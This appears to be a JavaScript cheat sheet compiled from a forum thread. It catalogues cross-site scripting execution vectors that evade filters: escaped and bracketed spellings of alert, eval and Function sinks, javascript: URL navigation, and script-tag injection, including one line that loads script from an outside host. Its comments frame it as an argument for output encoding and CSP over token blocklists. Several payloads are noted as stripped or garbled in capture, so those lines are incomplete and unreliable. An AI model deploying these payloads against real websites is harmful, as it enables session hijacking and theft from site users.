/*
* I will update this thread with the replies when I have time; any mod, feel free to help.
* Context: a catalogue of ways to reach JavaScript execution once an injection point exists. Many entries
* depend on engine-specific or legacy features (noted per line); the diversity is the argument that
* token blocklists (alert, eval, javascript:) are not a defense -- contextual output encoding and CSP are.
*/
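// Direct execution
// NOTE(review): each form below still needs an injection point; what the list shows is that the
// callee can be spelled in many ways, so filters matching tokens such as "alert(" do not stop the
// class. Several forms use engine-specific features as marked in the original notes (E4X <>...</>,
// #1= sharp variables, __noSuchMethod__, legacy "setter =" syntax, IE conditional compilation);
// confirm against the target engine before relying on any of them.

// Property access by string instead of a bare identifier.
window["alert"](1); // this["alert"], self["alert"], etc.. see references to window

// E4X XML literals whose string value is "alert" (JS1.6+, FF).
self[<>alert</>](1); // JS1.6+
self[<><![CDATA[alert]]></>](1);

// Hex string escapes spell "alert"; the /**/ comments break up the token.
// (\x escapes only have meaning inside a string literal, so the quotes are required.)
top/**/["\x61\x6c\x65\x72\x74"]/**/(1);

// Unicode escapes inside the identifier itself.
// NOTE(review): \u000a is a line feed, not an identifier character, so the second form as captured
// may not be what was originally posted -- confirm against the source thread.
\u0061lert(1), alert\u000a(1);

// Sharp variable (#1=) assignment inside the expression (FF only).
(ä=#1={}&&alert)(ä); // ff only

// Reaching the function object without naming it at the call site.
alert.valueOf().call(self, 1);
[alert.valueOf()][0].valueOf()(1);

// IE conditional compilation: the commented text is live only when @cc_on is honoured.
{x/*@cc_on=alert@*/}x/*@(/xss/@*/); // ie only

// __noSuchMethod__ is invoked with the missing method's name and its arguments; with Function as
// the handler, the argument string becomes the function body (FF only).
({__noSuchMethod__:Function}).aaaaa$dddddddddfffffff_____("alert(1)")() // ff only

// ff only
location.__noSuchMethod__ = location.replace; location["javascript:alert(1)"]();
window.__noSuchMethod__ = setTimeout; window["alert(2)"]();

// Implicit conversions call user-supplied toString/valueOf -- neither "=" nor "()" touches the sink directly.
"" + {toString:alert} // code execution with no [=()], doesnt work on FF with native functions
1 * ({valueOf:alert}) // code execution with no [=()], doesnt work on FF with native functions

// Legacy setter syntax: the assignment itself triggers the call (FF only).
a setter = alert; a = "hello"; // function execution without [()] ff only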
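// Evaluate code
// NOTE(review): every entry here reaches a string-to-code sink (eval, Function, timer strings,
// execScript). A CSP without 'unsafe-eval' blocks this class regardless of how the sink is reached.
eval("alert(1)");
setTimeout("alert(1)");
setInterval("alert(1)"); // lots of alerts..
Function("alert(1)")();

// (typeof prompt) is "function"; upper-casing its first letter yields "Function".
// String.toUpperCase used as a callback here relies on a non-standard generic (FF).
self[(typeof prompt).replace(/^./, String.toUpperCase)]("alert(1)")();

// An array's constructor's constructor is Function -- no "Function" token needed.
[].constructor.constructor('alert(1)')();

execScript("alert(1)"); // IE only

// E4X literal as the property name, window.name as the payload carrier (JS1.6+, FF).
window[<>eval</>](name); // JS1.6+

// eval as the replace callback: the matched string is the code that runs.
'alert("xss")'.replace(/.*/g, eval)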
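// Generate/add script tags
// Each form inserts a <script> element and points its src at an attacker-controlled URL ('url' is
// a placeholder). The with(document) shorthand hides the "document." prefix from token filters, and
// body.previousSibling is used as a way to reach <head> without naming it.
with(document) body.previousSibling.appendChild(createElement('script')).src = 'url'
with(document) querySelector('head').appendChild(createElement('script')).src = 'url'
// E4X element literal; only builds the markup string.
with(a = <script/>) a.@src = 'url', a.toXMLString(); // FF only, generates the string only (doesn't execute)
// Namespaced creation: the element must be in the XHTML namespace to be treated as a script.
with(document) body.previousSibling.appendChild(createElementNS('http://www.w3.org/1999/xhtml', 'html:script')).src = 'url'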
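// Virtual DOM (execution before appendChild, for escaping sandboxes)
// NOTE(review): the point of this section is that handlers/scripts on detached elements may fire
// without the element ever being inserted into the live document, so sandboxes that only watch
// insertion points (appendChild and friends) miss them. Several string payloads in this section
// were stripped when the post was captured (empty " " literals); restore them from the original
// thread before use -- nothing has been invented here.

// IE only
document.createElement("html").appendChild(document.createElement("script")).text = "alert('ie sucks')";
document.createElement("html").appendChild(document.createElement("script")).setAttribute('src', '//0x.lv');

// WebKit only (Chrome/Safari) -- the innerHTML payload on this line was truncated in the captured
// post, so it is kept as a comment in the form it arrived:
//   document.createElementNS("http://www.w3.org/1999/xhtml", "html").innerHTML = '

// FF only
document.createElement("pre").innerHTML = " "; // payload stripped in capture
with(new Image) setAttribute('onerror', 'alert(1)'), src = '.';
with(document.createElement("img")) setAttribute('onerror', 'alert(1)'), setAttribute('src', '.');
new Option().innerHTML = " "; // tip: [new Option][0][name]=location.hash // name=innerHTML, location.hash=<payload>

// Opera only -- javascript: URL in an image src.
new Image().src = "javascript:alert(1234)";
document.createElement('img').src = "javascript:alert(1234)";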
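// Location
// NOTE(review): navigating the current document to a javascript: URL runs the code in the page's origin.
location = 'javascript:alert(1)';
location.assign('javascript:alert(1)');
location.replace('javascript:alert(1)');

// Supposing the url is http://victim/asdf/#%0aalert(1) (ie only)
// Only the scheme is swapped; the rest of the URL -- including the payload in the fragment -- is kept.
location.protocol = 'javascript';

document.URL = 'javascript:alert(1)'; // ie

// E4X Namespace object; \x61 spells the "a" of alert inside the string.
location = Namespace('javascript:\x61lert(1)').uri // ff

frameElement.src = 'javascript:alert(1)'; /* requires to be framed in same origin (frame a page with a frame and do frames[0].frames[0].location = "xss victim") */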
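// Etc..
// NOTE(review): the first item is an HTML meta-refresh vector, not JavaScript; it arrived garbled
// in the captured post and is kept here as a comment exactly as captured:
//   <meta http-equiv=refresh content},url?xss.swf>
// The destination appears to be a .swf (a redirect into Flash content rather than a javascript:
// URL) -- confirm against the source thread before reuse.

// IE only: the styleSheets collection is indexed with (), cssText is assignable, and window.name
// carries the payload.
document.styleSheets(0).cssText = name; // IE only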